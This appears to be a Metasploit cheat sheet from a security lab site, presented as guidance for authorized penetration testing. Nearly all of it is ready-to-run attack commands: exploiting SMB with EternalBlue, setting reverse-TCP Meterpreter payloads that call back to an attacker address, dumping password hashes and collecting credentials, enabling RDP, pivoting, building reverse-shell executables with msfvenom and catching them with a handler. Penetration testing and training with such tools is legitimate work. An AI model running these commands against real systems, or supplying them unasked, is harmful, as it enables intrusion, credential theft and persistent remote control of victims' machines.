⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.
> Metasploit Framework Guide
EXPLOITATION FRAMEWORK
# STARTING METASPLOIT
msfconsole
msfconsole -q # quiet mode (no banner)
# DATABASE SETUP
msfdb init
db_status # verify connected
# BASIC WORKFLOW
search eternalblue # search for exploits
use exploit/windows/smb/ms17_010_eternalblue
show options # see required parameters
set RHOSTS 192.168.1.10
set LHOST 10.10.10.1
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run # or exploit
# SCANNING
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,80,443,445,3389
run
# METERPRETER COMMANDS (after exploitation)
sysinfo # system info
getuid # current user
getsystem # try privilege escalation
hashdump # dump SAM hashes
ps # list processes
migrate 1234 # migrate to process ID 1234
upload file.exe # upload file
download file.exe # download file
shell # drop to system shell
background # background session
sessions -l # list all sessions
sessions -i 1 # interact with session 1
# POST EXPLOITATION MODULES
run post/windows/gather/credentials/credential_collector
run post/multi/recon/local_exploit_suggester
run post/windows/manage/enable_rdp
run post/multi/manage/autoroute
run post/windows/gather/hashdump
# GENERATE PAYLOADS (msfvenom)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f exe -o payload.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f elf -o payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f powershell
# HANDLER (catch reverse shells)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run -j # run in background